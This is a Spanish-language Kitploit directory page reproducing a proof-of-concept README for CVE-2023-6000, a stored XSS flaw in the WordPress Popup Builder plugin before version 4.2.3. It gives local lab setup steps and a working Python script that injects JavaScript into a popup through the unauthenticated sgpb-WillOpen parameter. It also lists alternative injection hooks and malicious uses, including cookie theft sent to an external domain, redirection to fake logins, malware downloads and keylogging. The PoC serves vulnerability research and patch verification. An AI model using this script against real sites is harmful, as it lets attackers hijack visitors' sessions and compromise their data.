Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-6000-POC — Esta vulnerabilidad muestra una falla XSS en un plugin de ventanas emergentes de WordPress, permitiendo a los atacantes inyectar JavaScript malicioso a través de un XSS almacenado. | Kitploit
Herramientas/GitHubGitHub/ronf98/cve-2023-6000-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHubronf98/cve-2023-6000-poc

CVE-2023-6000-POC

Esta vulnerabilidad muestra una falla XSS en un plugin de ventanas emergentes de WordPress, permitiendo a los atacantes inyectar JavaScript malicioso a través de un XSS almacenado.

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Detalles Generales

  • CVE-ID : CVE-2023-6000
  • Puntuación CVSS : 6.1
  • Tipo : XSS Almacenado
  • Versión corregida : Popup Builder 4.2.3

Esta vulnerabilidad permite a un atacante explotar una falla de Cross-Site Scripting (XSS) en el plugin Popup Builder de WordPress. El plugin no impide que los visitantes normales modifiquen las ventanas emergentes existentes y, al enviar una solicitud especialmente diseñada al servidor, el atacante puede inyectar scripts maliciosos en la ventana emergente, que se ejecutarán cuando los usuarios interactúen con ella.

Para esta POC, la vulnerabilidad se activará manipulando el comportamiento de apertura del popup, donde se inyectará un simple script de alerta para que se ejecute cuando se abra el popup. Este tipo de ataque puede provocar una serie de problemas, incluido el acceso no autorizado a información sensible y una mayor explotación del sitio web afectado, comprometiendo potencialmente los datos del usuario o todo el sitio.

Configuración del Entorno de la POC

  1. Descargar XAMPP para alojar el servidor web local (última versión)
  2. Crear una base de datos SQL
  3. Instalar WordPress (última versión)
  4. Acceder a WordPress-admin e instalar una versión vulnerable de Popup Builder (<4.2.3)
  5. Configurar una página principal simple y un popup para mostrar la vulnerabilidad

Paso 1: XAMPP

Para esta POC, podemos usar una máquina con Windows 10 y descargar XAMPP: https://www.apachefriends.org/download.html
Después de la instalación, asegúrate de activar los módulos Apache y MySQL:

image

Paso 2: Base de datos SQL

WordPress, como la mayoría de los sistemas de gestión de contenido, requiere una base de datos para almacenar todos sus datos esenciales. La base de datos SQL que crearemos actúa como almacenamiento central para toda esta información.

  • En tu navegador, ve a http://localhost/phpmyadmin
  • Ve a la pestaña Bases de datos y crea una nueva base de datos (por ejemplo, wordpress_db).
  • Anota el nombre de la base de datos, ya que lo necesitarás durante la configuración de WordPress.

Paso 3: WordPress

  • Descargar WordPress desde su sitio oficial - https://wordpress.org/download/
  • Después de descargar, extrae el archivo zip de WordPress en la carpeta del directorio de instalación de XAMPP en C:\xampp\htdocs\
  • Luego, ve a http://localhost/wordpress, lo que mostrará la pantalla de instalación.
  • En el nombre de la base de datos, ingresa el nombre de la base de datos SQL que creamos; el resto puede mantenerse por defecto (usuario: root, contraseña: vacía (predeterminado para XAMPP)).
  • Si la conexión a la base de datos es exitosa, puedes crear un usuario Administrador para acceso posterior.

Paso 4: Popup Builder

La versión vulnerable del plugin Popup Builder se puede descargar desde su sitio principal: https://wordpress.org/plugins/popup-builder/advanced/
Elige una versión anterior a la corrección en 4.2.3:
image
Luego, ve a tu página de administración de WordPress - http://localhost/wordpress/wp-login.php
Plugins -> Añadir nuevo plugin -> Subir plugin -> Elegir el archivo .ZIP descargado e instalar

Paso 5: Página Principal y Popup

En la página de administración de WordPress, podemos crear una página principal simple yendo a Páginas -> Añadir nueva página -> Elegir un patrón.
Para el popup, ve a Popup Builder -> Añadir nuevo -> Elegir tipo y personalizar.
Para esta POC, seleccioné un popup de suscripción, ya que es uno de los más comunes en los sitios web hoy en día.
image

En la pestaña Reglas de visualización, puedes asociar el popup a tu página principal:
image

Ahora, cuando accedemos a nuestra página principal usando http://localhost/wordpress/
podemos ver que nuestro popup se activa.

Exploit

Para ejecutar el exploit, primero necesitamos identificar el ID del Popup.
Esto se puede hacer navegando al sitio, activando el popup y abriendo la pestaña Red en las herramientas de desarrollador.
Busca la solicitud admin-ajax.php, un componente central de WordPress utilizado para manejar solicitudes AJAX.
Popup Builder utiliza esto para gestionar funciones como guardar, actualizar, previsualizar y controlar popups dentro de WordPress.

En la pestaña Payload, podemos encontrar el ID del popup:

image

Después de encontrar el ID del Popup, podemos usar el siguiente script para desencadenar el exploit:

root@kitploit:~
import requests

# Define the target URL for the vulnerable site
url = "http://localhost/wordpress/"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
    }
data = {
    "sgpb-is-preview": "1",
    "post_ID": "22",     #use the Popup ID we found
    "sgpb-type": "html",
    "sgpb-WillOpen": "alert('Stored XSS Executed Successfully');"     #custom JS code goes here
    }

# Send the POST request and output the results
response = requests.post(url, data=data)
print(response.text)

Opciones Adicionales

Dado que podemos editar el popup, también podemos controlar el momento de activación de nuestro JS personalizado. Si vamos a la página de administración de WordPress, en la configuración del popup podemos ver una opción "Custom JS or CSS", que controlará el momento del código personalizado:

  • "sgpb-ShouldOpen" : Se ejecuta antes de que el popup comience a abrirse, verificando si debe abrirse.
  • "sgpb-WillOpen" : Se ejecuta justo antes de que el popup se abra, permitiendo acciones de último momento.
  • "sgpb-DidOpen" : Se ejecuta inmediatamente después de que el popup se haya abierto por completo, ideal para acciones posteriores a la carga (por ejemplo, XSS).
  • "sgpb-ShouldClose" : Verificaciones o acciones activadas antes de que el popup comience a cerrarse.
  • "sgpb-WillClose" : Se ejecuta justo antes de que el popup se cierre, permitiendo cambios finales.
  • "sgpb-DidClose" : Se ejecuta inmediatamente después de que el popup se haya cerrado por completo.

image

Luego podemos incorporar esto en nuestro script según el uso deseado.

Ejecución

Después de ejecutar el script, podemos ver en la página de administración de WordPress que se ha añadido una nueva línea a la sección de JS personalizado de nuestro popup:

image

Ahora, al ingresar al sitio como un usuario normal, podemos ver el siguiente mensaje emergente:

image

También podemos ver que nuestro mensaje se guardó dentro de la base de datos SQL (bajo la tabla wp_postmeta por defecto), lo que confirma que se trata de un XSS almacenado:

image

Posibles Usos

Esta vulnerabilidad de XSS almacenado en el plugin Popup Builder permite al atacante incrustar JavaScript malicioso que puede ejecutarse cada vez que un usuario interactúa con el popup infectado. Las siguientes son formas de explotarlo maliciosamente:

  • Secuestro de sesión : El código JS malicioso puede robar cookies de sesión y enviarlas a un dominio externo, permitiendo a los atacantes tomar el control de las cuentas de usuario.
  • Redirección : El script puede redirigir a los usuarios a páginas de inicio de sesión falsas u otros sitios maliciosos (esto se puede hacer agregando el siguiente código JS: window.location.href = 'https://facebook.com')
  • Descargas automáticas : El atacante puede activar descargas de archivos maliciosos, haciendo que los usuarios instalen malware sin saberlo.
  • Desfiguración y desinformación : Los scripts inyectados pueden manipular el contenido de la página, desfigurando el sitio o mostrando información falsa a los usuarios.
  • Keylogger : Los scripts maliciosos pueden usarse para registrar las pulsaciones de teclas del usuario, capturando datos sensibles e información personal, y luego enviándolos al dominio del atacante.
Descargar herramienta